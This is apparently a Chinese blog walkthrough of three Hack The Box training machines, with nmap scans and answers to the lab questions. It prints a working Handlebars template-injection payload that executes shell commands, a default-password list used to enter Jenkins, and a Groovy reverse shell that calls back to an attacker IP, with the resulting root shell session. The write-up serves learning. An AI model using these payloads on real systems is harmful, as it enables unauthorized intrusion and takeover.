|_http-title: Bike
Aggressive OS guesses: Linux 5.0 (94%), Linux 5.4 (94%), Linux 5.0 - 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 5.0 - 5.3 (93%), Linux 2.6.32 (92%), Linux 4.15 - 5.6 (92%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (92%), Linux 2.6.32 - 3.13 (92%), Infomir MAG-250 set-top box (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up) scanned in 35.06 seconds
2.题目
TASK 1What TCP ports does nmap identify as open? Answer with a list of ports seperated by commas with no spaces, from low to high.
22,80(开启了这2个端口 )
TASK 2What software is running the service listening on the http/web port identified in the first question?
Node.js(https://blog.csdn.net/qq_41153478/article/details/81478112)
TASK 3What is the name of the Web Framework according to Wappalyzer?
express(https://blog.csdn.net/m0_46612221/article/details/123032154)
TASK 4What is the name of the vulnerability we test for by submitting {{7*7}}?
server side template injection(https://www.k0rz3n.com/2018/11/12/%E4%B8%80%E7%AF%87%E6%96%87%E7%AB%A0%E5%B8%A6%E4%BD%A0%E7%90%86%E8%A7%A3%E6%BC%8F%E6%B4%9E%E4%B9%8BSSTI%E6%BC%8F%E6%B4%9E/)
TASK 5What is the templating engine being used within Node.JS?
handlebars(和我们正常的SQL注入一样,需要让他报错才能获取其他的信息){{7*7}}
TASK 6What is the name of the BurpSuite tab used to encode text?
decoder(burp 的编码)
TASK 7In order to send special characters in our payload in an HTTP request, we'll encode the payload. What type of encoding do we use?
url(GET 请求编码)
TASK 8When we use a payload from HackTricks to try to run system commands, we get an error back. What is "not defined" in the response error?
require(打固定的 payload )
TASK 9What variable is the name of the top-level scope in Node.JS?
Global(https://davidcai1993.gitbooks.io/nodejs-api-doc-in-chinese/content/Globals.html,顶级作用域)
TASK 10By exploiting this vulnerability, we get command execution as the user that the webserver is running as. What is the name of that user?
root(进行注入查看)
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
TASK 11SUBMIT FLAG
6b258d726d287462d60c103d0142a81c(进行注入查看)
{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return process.mainModule.require('child_process').execSync('cat ../flag.txt');"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}
具体细节看一下官方的wp文档,设计到其他的前置知识,有一说一很细
Bike.pdf
1. 信息收集
└─# nmap -sVC -T5 -Pn -p- -O -open 10.129.116.203 --min-rate 5000 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 18:06 CST
Nmap scan report for 10.129.116.203
Host is up (0.25s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
8080/tcp open http Jetty 9.4.39.v20210325
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.39.v20210325)
Aggressive OS guesses: Linux 5.0 - 5.4 (95%), Linux 5.0 (94%), Linux 5.4 (94%), HP P2000 G3 NAS device (93%), Linux 4.15 - 5.6 (93%), Linux 5.3 - 5.4 (93%), Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (92%), Linux 3.7 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Nmap done: 1 IP address (1 host up) scanned in 39.37 seconds
2.题目
TASK 1What does the acronym CVE stand for?
Common Vulnerabilities and Exposures(https://zhuanlan.zhihu.com/p/551242990)
TASK 2What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?
Confidentiality, Integrity, Availability(三大网络安全原则)
TASK 3What is the version of the service running on port 8080?
Jetty 9.4.39.v20210325(这个在信息收集可以发现)
TASK 4What version of Jenkins is running on the target?
2.289.1(版本号)
emm,怎么说呢,在没有其他突破手段的时候,我们可以尝试一下使用默认密码或者其他弱口令的组合进行
# 这个是官方wp给的常见组合
admin:password
admin:admin
root:root
root:password
admin:admin1
admin:password1
root:password1
然后最后root:passwd进去了,让我有点难以接受
进去之后我们可以看到他的版本号 Jenkins 2.289.1
TASK 5What type of script is accepted as input on the Jenkins Script Console?
Groovy(https://baike.baidu.com/item/Groovy/180590)
TASK 6What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?
cmd.exe(win的命令行操作)
TASK 7What is a different command than "ip a" we could use to display our network interfaces' information on Linux?
ifconfig(这个是 Linux 的查看网络的命令)
TASK 8What switch should we use with netcat for it to use UDP transport mode?
-u(nc 的udp参数)
TASK 9What is the term used to describe making a target host initiate a connection back to the attacker host?
reverse shell(反弹shell的名字)
TASK 10SUBMIT FLAG
9cdfb439c7876e703e307864c9167a15(进行注入查看)
养成一个习惯,拿到一个 cms 的时候,你需要去检查他的所有版本和历史漏洞,进行一系列的排除,这样你的突破几率会大很多,渗透很繁琐,但是还是很吸引人,得沉得住气去学习
这里的话,他的突破点是一个 script 和 Groovy 语言交互的地方,使得可以命令执行 getshell
String host="10.10.14.22";
int port=8979;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
┌──(root㉿Tom)-[~/桌面]
└─# nc -lnvp 8979
listening on [any] 8979 ...
connect to [10.10.14.22] from (UNKNOWN) [10.129.117.91] 55956
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/
cd root
ls
flag.txt
snap
cat flag.txt
9cdfb439c7876e703e307864c9167a15
Pennyworth.pdf
1.信息收集
└─# nmap -sVC -T5 -Pn -p- -O -open 10.129.117.199 --min-rate 5000 Host script results: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 22:45 CST
Nmap scan report for 10.129.117.199
Host is up (0.35s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
No OS matches for host
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-10T14:47:37
|_ start_date: N/A
|_clock-skew: -1s
Nmap done: 1 IP address (1 host up) scanned in 135.63 seconds
2.题目
TASK 1Which Nmap switch can we use to enumerate machines when our packets are otherwise blocked by the Windows firewall?
-pn(nmap 禁ping主机的参数)
为了获得目标主机的总体视图,我们将从一个始终流行的nmap扫描开始。然而,我们将使用一个新的开关进行扫描。代替 -sv 服务检测开关,我们将使用-Pn。在真实的环境中,您应该期望存在防火墙,在并拒绝所有非标准连接请求或扫描尝试。在典型的nmap扫描过程中,nmap脚本将执行一种复杂的ping扫描,大多数防火墙都将其设置为拒绝自动的,没有问题。反复否认会引起怀疑,在典型的扫描中,很多同样的请求也会被拒绝。-Pn标志将跳过主机发现阶段,直接进入其他类型的探针,在一定程度上沉默您的主动扫描。无论这个学位有多小,都可能被证明是微不足道的在你考虑主动攻击主机之前你需要的生命线。
TASK 2What does the 3-letter acronym SMB stand for?
Server Message Block(这个是 Windows 的文件共享协议)
SMB 是一种网络文件共享协议打开计算机或服务器上与其他系统通信的端口。SMB 端口端口号一般为139和445。端口139 被用于通信的 SMB 方言使用NetBIOS。它是一种用于Windows操作系统的会话层协议本地网络上的系统。445端口用于较新版本的SMB(在Windows之后)2000年),允许SMB通过Internet进行通信。这也意味着你可以使用IP地址来使用SMB一样的文件共享。简单地说,SMB一直是一种网络文件共享协议。因此,SMB需要计算机或服务器上的网络端口,以便与其他计算机或服务器进行通信系统。SMB使用IP端口139或445。
TASK 3What port does SMB use to operate at?
445(上面有介绍)
TASK 4What command line argument do you give to `smbclient` to list available shares?
-L(smbclient 这个连接工具 -L 参数是查看共享目录)
TASK 5What character at the end of a share name indicates it's an administrative share?
$(这个是 smb 的共享协议标志)
TASK 6Which Administrative share is accessible on the box that allows users to view the whole file system?
C$(主目录)
TASK 7What command can we use to download the files we find on the SMB Share?
get(其他的参数可以看看 -h 进行查看)
TASK 8Which tool that is part of the Impacket collection can be used to get an interactive shell on the system?
psexec.py(他的getshell有点看头)但是我没有成功
这是一篇文章(有具体详细过程),我找了一圈资料好像是没有成功的,这里就做为一个扩展即可
这里国内有一篇文章,我看他复现成功了,下次有机会的遇到,可以参考一下
关注
公众号长期更新安全类文章,关注公众号,以便下次轻松查阅
觉得文章对你有帮助 请转发 点赞 收藏
如有侵权请联系:admin#unsafe.sh